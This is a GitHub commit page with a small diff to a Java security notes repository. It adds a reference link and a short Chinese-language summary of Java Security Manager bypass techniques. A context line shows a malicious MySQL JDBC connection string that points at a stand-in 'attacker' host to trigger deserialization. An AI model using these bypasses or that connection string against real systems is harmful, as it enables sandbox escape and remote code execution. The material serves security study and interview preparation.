Skip to content

Commit b7f14ff

Browse files
committed
sm
1 parent 10c61f8 commit b7f14ff

File tree

2 files changed

+11
-1
lines changed

2 files changed

+11
-1
lines changed

README.md

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -54,6 +54,8 @@ https://gv7.me/
5454

5555
https://github.com/safe6Sec/Fastjson
5656

57+
https://github.com/Firebasky/Java
58+
5759
https://y4er.com/
5860

5961
https://paper.seebug.org/1689/

java/README.md

Lines changed: 9 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -254,4 +254,12 @@ jdbc:mysql://attacker/db?queryInterceptors=com.mysql.cj.jdbc.interceptors.Server
254254

255255
如果目标的`RMI`服务暴漏了`Object`参数类型的方法,且该类在白名单中,我们就可以注入Payload进去以绕过检测
256256

257-
另外还一些骚思路,比如想办法改源码,或用`Java Agent`对某些方法`Hook`并更改等
257+
另外还一些骚思路,比如想办法改源码,或用`Java Agent`对某些方法`Hook`并更改等
258+
259+
260+
261+
### 谈谈`Security Manager`的绕过(★★★★)
262+
263+
通过设置参数`java.security.policy`指定`policy`以提权;反射调用`setSecurityManager`修改`Security Manager`以绕过;自定义`ClassLoader`并设置`ProtectionDomain`里面的权限初始化为所有权限以绕过;由于`native`方法不受`Java Security Manager`管控,所以可以调用这些方法绕过
264+
265+

0 commit comments

Comments
 (0)